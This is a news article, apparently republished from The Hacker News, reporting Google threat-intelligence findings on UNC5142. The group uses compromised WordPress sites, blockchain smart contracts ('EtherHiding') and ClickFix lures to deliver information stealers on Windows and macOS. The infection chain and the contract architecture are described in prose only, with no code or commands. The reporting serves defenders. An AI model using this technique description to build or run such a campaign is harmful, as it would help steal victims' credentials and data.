UNC5142 Threat Actor
A financially motivated threat actor, codenamed UNC5142, abuses blockchain smart contracts to distribute information stealers such as Atomic (AMOS), Lumma, Rhadamanthys (aka RADTHIEF), and Vidar, actively targeting both W’indows and Apple macOS systems.
According to Google Threat Intelligence Group (GTIG), “UNC5142 is characterized by its use of compromised WordPress websites and ‘EtherHiding,’ a technique used to obscure malicious code or data by placing it on a public blockchain, such as the BNB Smart Chain,” the team said in a report shared with The Hacker News.
By June 2025, Google had already flagged about 14,000 web pages containing injected JavaScript that displayed behavior linked to UNC5142, revealing the group’s indiscriminate targeting of vulnerable WordPress sites. However, the tech giant clarified that it has not detected any UNC5142 activity since July 23, 2025, which may indicate either a pause or an operational pivot.
Researchers first documented EtherHiding in October 2023, when Guardio Labs detailed attacks that delivered malicious code through Binance’s Smart Chain (BSC) contracts embedded in infected sites that displayed fake browser update warnings.
It’s operation
At the core of these attack chains lies a multi-stage JavaScript downloader called CLEARSHORT, which distributes the malware through compromised sites. In the first stage, attackers inject JavaScript malware into websites to retrieve the second-stage payload by interacting with a malicious smart contract stored on the BNB Smart Chain (BSC). They embed the first-stage malware into plugin-related files, theme files, and sometimes even directly into the WordPress database.
Meanwhile, the smart contract fetches a CLEARSHORT landing page from an external server. This page employs the ClickFix social engineering tactic to trick victims into running malicious commands via the Windows Run dialog or the Terminal app on macOS, ultimately infecting the system with stealer malware. As of December 2024, these landing pages—typically hosted on a Cloudflare .dev domain—arrive in an encrypted format.
CLEARSHORT infection chain
On Windows systems, the malicious command executes an HTML Application (HTA) file downloaded from a MediaFire URL. That file then drops a PowerShell script designed to bypass defenses, fetch the encrypted final payload from GitHub, MediaFire, or the group’s own infrastructure, and run the stealer directly in memory without leaving any trace on disk.
In macOS attacks observed in February and April 2025, the attackers used ClickFix decoys to prompt users to execute a bash command in Terminal. This command retrieved a shell script that employed curl to download the Atomic Stealer payload from a remote server.
UNC5142 final payload distribution over time
ClearFake Variant
Researchers assess CLEARSHORT as a variant of ClearFake, which Sekoia analyzed extensively in March 2025. ClearFake, a rogue JavaScript framework active since July 2023, infects compromised websites to deliver malware through drive-by downloads. Around May 2024, the attacks began integrating the ClickFix method.
The abuse of blockchain technology gives UNC5142 several advantages. This clever approach blends seamlessly with legitimate Web3 activity and enhances the group’s resilience against detection and takedown efforts.
Over the past year, Google observed significant evolution in UNC5142’s campaigns. The group shifted from a single-contract system to a more sophisticated three-smart-contract architecture starting in November 2024 to gain greater operational agility, followed by further refinements in January 2025.
“This new architecture is an adaptation of a legitimate software design principle known as the proxy pattern, which developers use to make their contracts upgradable,” GTIG explained.
“The setup functions as a highly efficient Router-Logic-Storage architecture where each contract has a specific job. This design allows for rapid updates to critical parts of the attack, such as the landing page URL or decryption key, without any need to modify the JavaScript on compromised websites. As a result, the campaigns are much more agile and resistant to takedowns.”
UNC5142 achieves this flexibility by exploiting the mutable nature of a smart contract’s data—since the program code itself remains immutable once deployed—to modify payload URLs. Each update costs the attackers between $0.25 and $1.50 in network fees.
Further investigation revealed that UNC5142 operates two distinct smart contract infrastructures to deliver stealer malware via the CLEARSHORT downloader. The Main infrastructure, created on November 24, 2024, serves as the core campaign system, while the Secondary infrastructure, funded on February 18, 2025, supports parallel operations.
“The Main infrastructure stands out as the core campaign infrastructure, marked by its early creation and steady stream of updates,” GTIG said. “The Secondary infrastructure appears as a parallel, more tactical deployment, likely established to support a specific surge in campaign activity, test new lures, or simply build operational resilience.”
“Given the frequent updates to the infection chain coupled with the consistent operational tempo, high volume of compromised websites, and diversity of distributed malware payloads over the past year and a half, it is likely that UNC5142 has experienced some level of success with their operations.”
Source: TheHackerNews
Read more at Impreza News
